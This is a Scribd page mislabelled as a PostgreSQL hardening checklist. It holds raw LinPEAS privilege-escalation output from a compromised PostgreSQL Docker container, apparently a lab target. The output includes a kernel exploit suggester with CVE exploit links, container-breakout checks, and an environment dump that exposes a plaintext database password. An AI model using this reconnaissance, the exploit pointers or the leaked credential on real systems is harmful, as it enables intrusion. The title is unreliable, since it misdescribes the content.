0% found this document useful (0 votes)
30 views26 pages

PostgreSQL Hardening Checklist

This document outlines a script for authorized penetration testing and educational purposes, emphasizing the importance of permission before use. It includes a Linux privilege escalation checklist, system information, and potential vulnerabilities associated with the Linux kernel and Docker containers. The document also provides links to resources for further exploration of privilege escalation techniques and protections in place.
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
30 views26 pages

PostgreSQL Hardening Checklist

This document outlines a script for authorized penetration testing and educational purposes, emphasizing the importance of permission before use. It includes a Linux privilege escalation checklist, system information, and potential vulnerabilities associated with the Linux kernel and Docker containers. The document also provides links to resources for further exploration of privilege escalation techniques and protections in place.
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

ADVISORY: This script should be used for authorized penetration testing and/or

educational purposes only. Any misuse of this software will not be the
responsibility of the author or of any other collaborator. Use it at your own
computers and/or with the computer owner's permission.

Linux Privesc Checklist: [Link]


[Link]
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username

Starting LinPEAS. Caching Writable Folders...


╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 5.15.0-134-generic (buildd@lcy02-amd64-081) (gcc (Ubuntu 11.4.0-
1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #145-Ubuntu SMP Wed
Feb 12 20:08:39 UTC 2025
User & Groups: uid=1000(postgres) gid=1000(postgres) groups=1000(postgres)
Hostname: eec1d86edd7a

[-] No network discovery capabilities (fping or ping not found)


[+] /usr/bin/bash is available for network discovery, port scanning and port
forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more
with -h)

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . DONE

╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ [Link]
[Link]#kernel-exploits
Linux version 5.15.0-134-generic (buildd@lcy02-amd64-081) (gcc (Ubuntu 11.4.0-
1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #145-Ubuntu SMP Wed
Feb 12 20:08:39 UTC 2025
lsb_release Not Found

╔══════════╣ Sudo version


sudo Not Found

╔══════════╣ PATH
╚ [Link]
[Link]#writable-path-abuses
/opt/bitnami/postgresql/bin:/opt/bitnami/common/bin:/opt/bitnami/postgresql/bin:/
opt/bitnami/common/bin:/opt/bitnami/postgresql/bin:/usr/local/sbin:/usr/local/
bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Date & uptime


Wed Apr 2 18:07:22 UTC 2025
18:07:22 up 2:21, 0 user, load average: 0.70, 0.58, 0.89
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)

╔══════════╣ Environment
╚ Any private information inside environment variables?
POSTGRESQL_LDAP_BASE_DN=
POSTGRESQL_INITDB_ARGS=
POSTGRESQL_CLIENT_MIN_MESSAGES=error
POSTGRESQL_PGBACKREST_LOGS_DIR=/bitnami/postgresql/pgbackrest/logs
POSTGRESQL_REPLICATION_USER=
POSTGRESQL_USERNAME=postgres
POSTGRESQL_LOG_TIMEZONE=
POSTGRESQL_DAEMON_GROUP=postgres
POSTGRESQL_PGBACKREST_BACKUPS_DIR=/bitnami/postgresql/pgbackrest/backups
POSTGRESQL_TCP_KEEPALIVES_COUNT=
POSTGRESQL_PREINITSCRIPTS_DIR=/docker-entrypoint-preinitdb.d
MODULE=postgresql
POSTGRESQL_BASE_DIR=/opt/bitnami/postgresql
POSTGRESQL_AUTOCTL_MONITOR_HOST=monitor
POSTGRESQL_DATA_DIR=/bitnami/postgresql/data
POSTGRESQL_TCP_KEEPALIVES_IDLE=
POSTGRESQL_LDAP_BIND_DN=
HOSTNAME=eec1d86edd7a
POSTGRESQL_PGBACKREST_SPOOL_DIR=/bitnami/postgresql/pgbackrest/spool
LANGUAGE=en_US:en
POSTGRESQL_CONF_DIR=/opt/bitnami/postgresql/conf
POSTGRESQL_ENABLE_LDAP=no
POSTGRESQL_LDAP_SEARCH_FILTER=
POSTGRESQL_LOG_HOSTNAME=
POSTGRESQL_INITDB_WAL_DIR=
POSTGRESQL_LDAP_PREFIX=
POSTGRESQL_LDAP_TLS=
POSTGRESQL_REPLICATION_PASSWORD=
POSTGRESQL_MASTER_HOST=
POSTGRESQL_BIN_DIR=/opt/bitnami/postgresql/bin
BITNAMI_ROOT_DIR=/opt/bitnami
POSTGRESQL_DEFAULT_TRANSACTION_ISOLATION=
POSTGRESQL_LDAP_SERVER=
LC_MONETARY=C
POSTGRESQL_TLS_CA_FILE=
POSTGRESQL_AUTOCTL_HOSTNAME=eec1d86edd7a
POSTGRESQL_PASSWORD_ENCRYPTION=
POSTGRESQL_POSTGRES_CONNECTION_LIMIT=
PWD=/bitnami/postgresql/data/base
OS_FLAVOUR=debian-12
POSTGRESQL_CLUSTER_APP_NAME=walreceiver
POSTGRESQL_STATEMENT_TIMEOUT=
POSTGRESQL_FSYNC=on
POSTGRESQL_SYNCHRONOUS_COMMIT_MODE=on
NSS_WRAPPER_LIB=/opt/bitnami/common/lib/libnss_wrapper.so
POSTGRESQL_TLS_CERT_FILE=
POSTGRESQL_DATABASE=marketusermanager
POSTGRESQL_CONF_FILE=/opt/bitnami/postgresql/conf/[Link]
POSTGRESQL_TMP_DIR=/opt/bitnami/postgresql/tmp
HOME=/
POSTGRESQL_RECOVERY_FILE=/bitnami/postgresql/data/[Link]
POSTGRESQL_INITSCRIPTS_USERNAME=postgres
POSTGRESQL_MOUNTED_CONF_DIR=/bitnami/postgresql/conf
LANG=en_US.UTF-8
POSTGRESQL_VOLUME_DIR=/bitnami/postgresql
POSTGRESQL_POSTGRES_PASSWORD=
POSTGRESQL_LDAP_SCHEME=
POSTGRESQL_PORT_NUMBER=5432
POSTGRESQL_TLS_PREFER_SERVER_CIPHERS=yes
POSTGRESQL_SHARED_PRELOAD_LIBRARIES=pgaudit
POSTGRESQL_NUM_SYNCHRONOUS_REPLICAS=0
POSTGRESQL_LOG_DIR=/opt/bitnami/postgresql/logs
POSTGRESQL_TIMEZONE=
POSTGRESQL_LOG_DISCONNECTIONS=
POSTGRESQL_USER=postgres
POSTGRESQL_LDAP_BIND_PASSWORD=
BITNAMI_DEBUG=false
POSTGRESQL_LOG_CONNECTIONS=
POSTGRESQL_SYNCHRONOUS_REPLICAS_MODE=
POSTGRESQL_TCP_KEEPALIVES_INTERVAL=
POSTGRESQL_USERNAME_CONNECTION_LIMIT=
POSTGRESQL_MASTER_PORT_NUMBER=5432
POSTGRESQL_FIRST_BOOT=yes
POSTGRESQL_INITSCRIPTS_PASSWORD=naR7yMTa4Wal!!!
POSTGRESQL_LOG_FILE=/opt/bitnami/postgresql/logs/[Link]
POSTGRESQL_LDAP_URL=
POSTGRESQL_PGHBA_REMOVE_FILTERS=
POSTGRESQL_AUTOCTL_VOLUME_DIR=/bitnami/postgresql/pgautoctl
POSTGRESQL_LOG_LINE_PREFIX=
POSTGRESQL_LDAP_SEARCH_ATTR=
POSTGRESQL_AUTOCTL_CONF_DIR=/bitnami/postgresql/pgautoctl/.config
POSTGRESQL_PGBACKREST_VOLUME_DIR=/bitnami/postgresql/pgbackrest
POSTGRESQL_PGAUDIT_LOG=all,-misc
SHLVL=3
POSTGRESQL_ENABLE_TLS=no
BITNAMI_VOLUME_DIR=/bitnami
PGSYSCONFDIR=/opt/bitnami/postgresql/etc
POSTGRESQL_EXTRA_FLAGS=
POSTGRESQL_AUTOCTL_MODE=postgres
POSTGRESQL_PGBACKREST_CONF_FILE=/bitnami/postgresql/data/[Link]
LC_MESSAGES=en_US.UTF-8
BITNAMI_APP_NAME=postgresql
POSTGRESQL_PGHBA_FILE=/opt/bitnami/postgresql/conf/pg_hba.conf
POSTGRESQL_PASSWORD=naR7yMTa4Wal!!!
POSTGRESQL_TLS_CRL_FILE=
POSTGRESQL_TLS_KEY_FILE=
POSTGRESQL_DEFAULT_TOAST_COMPRESSION=
POSTGRESQL_PGCTLTIMEOUT=60
POSTGRESQL_INIT_MAX_TIMEOUT=60
LC_CTYPE=en_US.UTF-8
APP_VERSION=14.12.0
POSTGRESQL_LDAP_PORT=
ALLOW_EMPTY_PASSWORD=no
POSTGRESQL_PID_FILE=/opt/bitnami/postgresql/tmp/[Link]
LC_TIME=C
POSTGRESQL_LDAP_SUFFIX=
POSTGRESQL_SHUTDOWN_MODE=fast
LC_COLLATE=en_US.UTF-8
POSTGRESQL_INITSCRIPTS_DIR=/docker-entrypoint-initdb.d
OS_NAME=linux
PATH=/opt/bitnami/postgresql/bin:/opt/bitnami/common/bin:/opt/bitnami/postgresql/
bin:/opt/bitnami/common/bin:/opt/bitnami/postgresql/bin:/usr/local/sbin:/usr/
local/bin:/usr/sbin:/usr/bin:/sbin:/bin
POSTGRESQL_DAEMON_USER=postgres
POSTGRESQL_PGAUDIT_LOG_CATALOG=
POSTGRESQL_DEFAULT_CONF_DIR=/opt/bitnami/postgresql/[Link]
POSTGRESQL_MAX_CONNECTIONS=
POSTGRESQL_REPLICATION_MODE=master
POSTGRESQL_PGAUDIT_LOG_PARAMETER=
LC_NUMERIC=C
OS_ARCH=amd64
OLDPWD=/bitnami/postgresql/data
POSTGRESQL_ALLOW_REMOTE_CONNECTIONS=yes
POSTGRESQL_WAL_LEVEL=replica
_=/usr/bin/env

╔══════════╣ Searching Signature verification failed in dmesg


╚ [Link]
[Link]#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester


╚ [Link]
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

Details: [Link]
exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
[Link]
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: [Link]
exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-2586] nft_object UAF

Details: [Link]
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: [Link]
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2022-0847] DirtyPipe

Details: [Link]
Exposure: less probable
Tags: ubuntu=(20.04|21.04),debian=11
Download URL: [Link]

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

Details: [Link]
[Link]
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL:
[Link]
2021-22555/exploit.c
ext-url: [Link]
2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded

╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... enabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes

╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present (if any):
╔══════════╣ Container details
═╣ Is this a container? ........... docker
═╣ Any running containers? ........ No
╔══════════╣ Docker Container details
═╣ Am I inside Docker group ....... No
═╣ Looking and enumerating Docker Sockets (if any):
═╣ Docker version ................. Not Found
═╣ Vulnerable to CVE-2019-5736 .... Not Found
═╣ Vulnerable to CVE-2019-13139 ... Not Found
═╣ Vulnerable to CVE-2021-41091 ... Not Found
═╣ Rootless Docker? ............... No

╔══════════╣ Container & breakout enumeration


╚ [Link]
security/docker-breakout-privilege-escalation/[Link]
═╣ Container ID ................... eec1d86edd7a

═╣ Container Full ID .............. [Link]


═╣ Seccomp enabled? ............... enabled
═╣ AppArmor profile? .............. unconfined
═╣ User proc namespace? ........... enabled 0 0 4294967295
═╣ Vulnerable to CVE-2019-5021 .... No

══╣ Breakout via mounts


╚ [Link]
security/docker-breakout-privilege-escalation/[Link]
═╣ /proc mounted? ................. Yes
═╣ /dev mounted? .................. No
═╣ Run unshare .................... No
═╣ release_agent breakout 1........ No
═╣ release_agent breakout 2........ No
═╣ release_agent breakout 3........
═╣ core_pattern breakout .......... No
═╣ binfmt_misc breakout ........... No
═╣ uevent_helper breakout ......... No
═╣ is modprobe present ............ No
═╣ DoS via panic_on_oom ........... No
═╣ DoS via panic_sys_fs ........... No
═╣ DoS via sysreq_trigger_dos ..... No
═╣ /proc/[Link] readable ....... No
═╣ /proc/sched_debug readable ..... No
═╣ /proc/*/mountinfo readable ..... Yes
═╣ /sys/kernel/security present ... Yes
═╣ /sys/kernel/security writable .. No

══╣ Namespaces
╚ [Link]
security/namespaces/[Link]
total 0
lrwxrwxrwx 1 postgres postgres 0 Apr 2 18:07 cgroup -> cgroup:[4026532651]
lrwxrwxrwx 1 postgres postgres 0 Apr 2 18:07 ipc -> ipc:[4026532592]
lrwxrwxrwx 1 postgres postgres 0 Apr 2 18:07 mnt -> mnt:[4026532588]
lrwxrwxrwx 1 postgres postgres 0 Apr 2 18:07 net -> net:[4026532593]
lrwxrwxrwx 1 postgres postgres 0 Apr 2 18:07 pid -> pid:[4026531836]
lrwxrwxrwx 1 postgres postgres 0 Apr 2 18:07 pid_for_children -> pid:[4026531836]
lrwxrwxrwx 1 postgres postgres 0 Apr 2 18:07 time -> time:[4026531834]
lrwxrwxrwx 1 postgres postgres 0 Apr 2 18:07 time_for_children -> time:
[4026531834]
lrwxrwxrwx 1 postgres postgres 0 Apr 2 18:07 user -> user:[4026531837]
lrwxrwxrwx 1 postgres postgres 0 Apr 2 18:07 uts -> uts:[4026532589]

╔══════════╣ Container Capabilities


╚ [Link]
security/docker-breakout-privilege-escalation/[Link]#capabilities-abuse-escape
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80c25db
CapAmb: 0000000000000000
Run capsh --decode=<hex> to decode the capabilities

╔══════════╣ Privilege Mode


Not Found

╔══════════╣ Interesting Files Mounted


overlay on / type overlay
(rw,relatime,lowerdir=/var/lib/docker/overlay2/l/4T2PHFQS72J7P3W5RUUPUWYBAW:/var/
lib/docker/overlay2/l/HP3RHF5YB3FKCGQLFXAJ35NB53:/var/lib/docker/overlay2/l/
U76OHM4BXJVGK6GNIRLP3NKO5F:/var/lib/docker/overlay2/l/JPUGE3SQ33SMTMDUPKDXH6GLW6:/
var/lib/docker/overlay2/l/H6U4NDPJEK2CACY3SOAIOEKSKT:/var/lib/docker/overlay2/l/
Q3GP4L6W2Q5ISHYMDY4IUX6WMC:/var/lib/docker/overlay2/l/2QGB4KFNVERZR7QIZTYA5UI4LI:/
var/lib/docker/overlay2/l/YC7AWSUXZ6UE77M4T3VSSRYMW3:/var/lib/docker/overlay2/l/
6Q76INPOADJX22ULGOAY54ZH4L:/var/lib/docker/overlay2/l/CXV52YMR6NXA7WVFGPC6Q3RZYS:/
var/lib/docker/overlay2/l/S5I4CFNYSJDI4QYNXIADP7BU4P:/var/lib/docker/overlay2/l/
ZFGX4MWN6ZR3SFTRALX7P5T2TU:/var/lib/docker/overlay2/l/TVOM2Q3WHKHOE4AYQU3CUGBKPD:/
var/lib/docker/overlay2/l/SL6NXQ3QA4ZOKTKJDFAHSY4O75:/var/lib/docker/overlay2/l/
DLXZOATF3OCG6RORD2R73LVARV:/var/lib/docker/overlay2/l/3GGWAR34SNFMQALCMME4XFACRV:/
var/lib/docker/overlay2/l/YHPZLBQSZUUTWS364Q6PGBNMVH:/var/lib/docker/overlay2/l/
WGJGCDWBQXQ2XWAME6VOFXLXDJ:/var/lib/docker/overlay2/l/O2774CR4T54SGKSRSQQ7JO3JT2:/
var/lib/docker/overlay2/l/YMCWQJRIKRTZA7BF4EXRCJSVUH:/var/lib/docker/overlay2/l/
UBIAV4FEFNBG7XL7FROS4HDCOC:/var/lib/docker/overlay2/l/MVCBW7AJKJCNOWZ4CC57IEEL7L:/
var/lib/docker/overlay2/l/3EWY2R7IDJWUWFQOG3BHOSCR3K:/var/lib/docker/overlay2/l/
O4L4NY35ONW4A5MLL265QGTDFV:/var/lib/docker/overlay2/l/UMAR4L4N4YMPE5ULNVHZOWRKNV:/
var/lib/docker/overlay2/l/KQODGSTUQD5RHSLJZXFOJQD4NB:/var/lib/docker/overlay2/l/
IPNVFWD6QPDBF2W7JMERBCLB4T:/var/lib/docker/overlay2/l/ZUO7ZFIYHVOUVWNYRSHLBGNSYB:/
var/lib/docker/overlay2/l/F5CU3O5HJVNM47TJIJK6F5AXO7:/var/lib/docker/overlay2/l/
62QIV7IOR6GKPOFYYSSLT7VJ2M:/var/lib/docker/overlay2/l/GSBJJ6IVPU5THZYINNK2YUBTKO:/
var/lib/docker/overlay2/l/U66MUFFBAMAGLNRXSKGVHZ5ZSU:/var/lib/docker/overlay2/l/
AJ2P3ELHSLSRVZ3ELB2F624F6R:/var/lib/docker/overlay2/l/GFERGETEIGYDPL2SPX3NOCSX2S:/
var/lib/docker/overlay2/l/URRQ7MLTWUW5RUDSCQNUHJJTWG:/var/lib/docker/overlay2/l/
CJTKZ4IU7VZBKHAR4UGVCSBLOT:/var/lib/docker/overlay2/l/GROGB633N6GVHL4BQFLTYF3XBU:/
var/lib/docker/overlay2/l/2MZGU6T6XYQFPG4OOLUIQH534X:/var/lib/docker/overlay2/l/
I3M5V3KDCKO6V4IX6GJQQRAHGU:/var/lib/docker/overlay2/l/J3ZDO7GMJSCHJHPPMTO7XHG5TO:/
var/lib/docker/overlay2/l/DRHSVQ7SSI7GZ3675RIWT6ZXXV:/var/lib/docker/overlay2/l/
2CRQ3H35O6UG2A73KFWQPBDDKZ:/var/lib/docker/overlay2/l/TUBYIYTNPZV2CHWCIE2UTJDXM6:/
var/lib/docker/overlay2/l/RVU237USIZ3XSG3WUWWMMTTO6G:/var/lib/docker/overlay2/l/
VQYMKEWZKUIW5I7Q45THSNOPGM:/var/lib/docker/overlay2/l/EEQZ3M3BKID26QGJEFTZGZXCT4:/
var/lib/docker/overlay2/l/SXASGXOA6SGQDLLRNG3YCO5WZ6:/var/lib/docker/overlay2/l/
O7SHIDNW5VGWTWRJBPYD66OG6B:/var/lib/docker/overlay2/l/
X2PMHV4CHMFX6BWN2KQEELGS2U,upperdir=/var/lib/docker/overlay2/
d24c08a47b433adb5e29eb8b61529c7157f2c61a655bc919698aa609b62f199e/diff,workdir=/
var/lib/docker/overlay2/
d24c08a47b433adb5e29eb8b61529c7157f2c61a655bc919698aa609b62f199e/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
devpts on /dev/pts type devpts
(rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup type cgroup2
(ro,nosuid,nodev,noexec,relatime,nsdelegate,memory_recursiveprot)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/mapper/ubuntu--vg-ubuntu--lv on /docker-entrypoint-preinitdb.d type ext4
(rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /docker-entrypoint-initdb.d type ext4
(rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on
/docker-entrypoint-initdb.d/[Link] type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /home/rceflag type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /bitnami/postgresql type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/[Link] type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/hostname type ext4 (rw,relatime)
/dev/mapper/ubuntu--vg-ubuntu--lv on /etc/hosts type ext4 (rw,relatime)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/acpi type tmpfs (ro,relatime,inode64)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755,inode64)
tmpfs on /proc/scsi type tmpfs (ro,relatime,inode64)
tmpfs on /sys/firmware type tmpfs (ro,relatime,inode64)

╔══════════╣ Possible Entrypoints

/docker-entrypoint-initdb.d:
/docker-entrypoint-preinitdb.d:
drwxrwxr-x 2 root root 4.0K Mar 19 14:57 .
drwxr-xr-x 1 root root 4.0K Mar 19 14:57 ..
drwxr-xr-x 2 root root 4.0K Mar 19 14:57 .
-rw-r--r-- 1 root root 53K Mar 11 10:23 [Link]
-rwx------ 1 postgres postgres 0 Apr 2 17:51 /tmp/[Link]
-rwx------ 1 postgres postgres 1.7K Apr 2 17:50 /tmp/[Link]
-rwx------ 1 postgres postgres 1.7K Apr 2 17:57 /tmp/[Link]
-rwx------ 1 postgres postgres 821K Apr 2 18:00 /tmp/[Link]
total 64K
total 8.0K

╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
Learn and practice cloud hacking techniques in [Link]

═╣ GCP Virtual Machine? ................. No


═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM or Az metadata? ............. No
═╣ Azure APP or IDENTITY_ENDPOINT? ...... No
═╣ Azure Automation Account? ............ No
═╣ Aliyun ECS? .......................... No
═╣ Tencent CVM? ......................... No

╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected proceses run by root:
[Link]
[Link]#processes
root 1 0.0 0.3 166564 11932 ? Ss 15:45 0:07 /sbin/init
root 534 3.8 0.6 97696 24032 ? S<s 15:45 5:25
/lib/systemd/systemd-journald
root 575 0.0 0.6 354884 27096 ? SLsl 15:45 0:01 /sbin/multipathd
-d -s
root 580 0.0 0.1 26816 7396 ? Ss 15:45 0:01
/lib/systemd/systemd-udevd
root 760 0.0 0.2 51148 11812 ? Ss 15:45 0:00
/usr/bin/VGAuthService
root 761 0.1 0.2 315080 9320 ? Ssl 15:45 0:10
/usr/bin/vmtoolsd
root 769 0.2 0.0 101592 3192 ? S<sl 15:45 0:19 /sbin/auditd
root 771 0.0 0.0 3284 2184 ? S< 15:45 0:06 _ /sbin/audisp-
syslog LOG_LOCAL6
101 834 0.0 0.2 16256 8268 ? Ss 15:46 0:01
/lib/systemd/systemd-networkd
102 836 0.0 0.3 26464 13360 ? Ss 15:46 0:00
/lib/systemd/systemd-resolved
root 856 0.0 0.0 3088 2032 ? Ss 15:46 0:00
/usr/share/pt/agent/agent
root 1029 0.0 1.7 82160 69164 ? S 15:46 0:01 _
/usr/share/pt/agent/agent
root 1047 0.2 3.2 257904 129984 ? Sl 15:46 0:17 _
/usr/share/pt/agent/agent
root 1048 0.2 3.3 259704 131096 ? Sl 15:46 0:17 _
/usr/share/pt/agent/agent
103 861 0.0 0.1 36036 4972 ? Ss 15:46 0:02 @dbus-daemon[0m
--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 868 0.0 0.0 82836 3900 ? Ssl 15:46 0:00
/usr/sbin/irqbalance --foreground
root 871 0.0 0.5 32948 19968 ? Ss 15:46 0:00 /usr/bin/python3
/usr/bin/networkd-dispatcher --run-startup-triggers
root 872 0.0 0.1 43632 6012 ? Ss 15:46 0:00
/usr/sbin/oddjobd -n -p /run/[Link] -t 300
root 873 0.0 0.1 234512 6836 ? Ssl 15:46 0:00
/usr/libexec/polkitd --no-debug
root 875 1.7 0.1 152448 5556 ? Ssl 15:46 2:28
/usr/sbin/rsyslogd -n -iNONE
root 879 0.0 0.4 1469164 19076 ? Ssl 15:46 0:04
/usr/lib/snapd/snapd
root 882 0.0 0.2 45180 11884 ? Ss 15:46 0:00 /usr/sbin/sssd -
i --logger=files
root 953 0.0 0.5 111568 23192 ? S 15:46 0:02 _
/usr/libexec/sssd/sssd_be --domain [Link] --uid 0 --gid 0 --logger=files
root 973 0.0 0.3 60576 15800 ? S 15:46 0:00 _
/usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root 974 0.0 0.3 34900 12300 ? S 15:46 0:02 _
/usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
root 975 0.0 0.2 32636 10504 ? S 15:46 0:00 _
/usr/libexec/sssd/sssd_ssh --uid 0 --gid 0 --logger=files
root 977 0.0 0.2 32536 10500 ? S 15:46 0:00 _
/usr/libexec/sssd/sssd_sudo --uid 0 --gid 0 --logger=files
root 978 0.0 0.3 76012 15376 ? S 15:46 0:00 _
/usr/libexec/sssd/sssd_pac --uid 0 --gid 0 --logger=files
root 886 0.0 0.2 392592 11896 ? Ssl 15:46 0:00
/usr/libexec/udisks2/udisksd
root 889 0.0 0.7 1431404 30492 ? Ssl 15:46 0:07
/usr/bin/containerd
115 905 0.0 0.0 18904 3336 ? S 15:46 0:00
/usr/sbin/chronyd -F 1
115 937 0.0 0.0 10576 464 ? S 15:46 0:00 _
/usr/sbin/chronyd -F 1
root 918 0.0 0.2 317032 10224 ? Ssl 15:46 0:00
/usr/sbin/ModemManager
114 969 0.0 0.7 218384 30156 ? Ss 15:46 0:00
/usr/lib/postgresql/14/bin/postgres -D /var/lib/postgresql/14/main -c
config_file=/etc/postgresql/14/main/[Link]
114 981 0.0 0.2 218496 9728 ? Ss 15:46 0:00 _ postgres:
14/main: checkpointer
114 982 0.0 0.1 218384 6944 ? Ss 15:46 0:00 _ postgres:
14/main: background writer
114 983 0.0 0.2 218384 11556 ? Ss 15:46 0:00 _ postgres:
14/main: walwriter
114 984 0.0 0.2 218948 9456 ? Ss 15:46 0:00 _ postgres:
14/main: autovacuum launcher
114 985 0.0 0.1 72976 6448 ? Ss 15:46 0:00 _ postgres:
14/main: stats collector
114 986 0.0 0.1 218812 7692 ? Ss 15:46 0:00 _ postgres:
14/main: logical replication launcher
root 995 0.0 0.0 6896 2976 ? Ss 15:46 0:00 /usr/sbin/cron -
f -P
root 996 0.0 0.1 24604 7484 ? Ss 15:46 0:01
/lib/systemd/systemd-logind
root 1002 2.5 1.7 2165040 68412 ? Ssl 15:46 3:39 /usr/bin/dockerd
-H fd:// --containerd=/run/containerd/[Link]
root 2094 0.0 0.0 1303736 2496 ? Sl 15:46 0:00 _
/usr/bin/docker-proxy -proto tcp -host-ip [Link] -host-port 5432 -container-ip
[Link] -container-port 5432
root 2103 0.0 0.0 1229748 2604 ? Sl 15:46 0:00 _
/usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 5432 -container-ip
[Link] -container-port 5432
root 2328 0.0 0.0 1156016 2724 ? Sl 15:46 0:00 _
/usr/bin/docker-proxy -proto tcp -host-ip [Link] -host-port 80 -container-ip
[Link] -container-port 80
root 2333 0.0 0.0 1229748 2536 ? Sl 15:46 0:00 _
/usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 80 -container-ip [Link]
-container-port 80
root 1009 0.0 0.0 6176 1164 ? Ss+ 15:46 0:00 /sbin/agetty -o
-p -- u --noclear tty1 linux
root 1010 0.0 0.5 109768 21444 ? Ssl 15:46 0:00 /usr/bin/python3
/usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 2012 1.2 0.7 1278972 30752 ? Ssl 15:46 1:48
/usr/local/bin/docker-compose -f /home/ubuntu/marketplace_project/docker-
[Link] up
root 2118 0.3 0.2 720776 7972 ? Sl 15:46 0:31
/usr/bin/containerd-shim-runc-v2 -namespace moby -id
eec1d86edd7a1b9bb89169b556bc189d5606508e8521585848f44ccf4d14b081 -address
/run/containerd/[Link]
postgres 2140 0.7 0.3 83836 13648 ? Ss 15:46 1:01 _
/opt/bitnami/postgresql/bin/postgres -D /bitnami/postgresql/data
--config-file=/opt/bitnami/postgresql/conf/[Link]
--external_pid_file=/opt/bitnami/postgresql/tmp/[Link]
--hba_file=/opt/bitnami/postgresql/conf/pg_hba.conf
postgres 2570 0.0 0.3 84052 14572 ? Ss 15:46 0:00 _ postgres:
checkpointer
postgres 2571 0.0 0.3 83968 12636 ? Ss 15:46 0:02 _ postgres:
background writer
postgres 2572 0.0 0.1 83836 5520 ? Ss 15:46 0:01 _ postgres:
walwriter
postgres 2573 0.0 0.1 84528 7292 ? Ss 15:46 0:00 _ postgres:
autovacuum launcher
postgres 2574 0.1 0.1 68440 4916 ? Ss 15:46 0:13 _ postgres:
stats collector
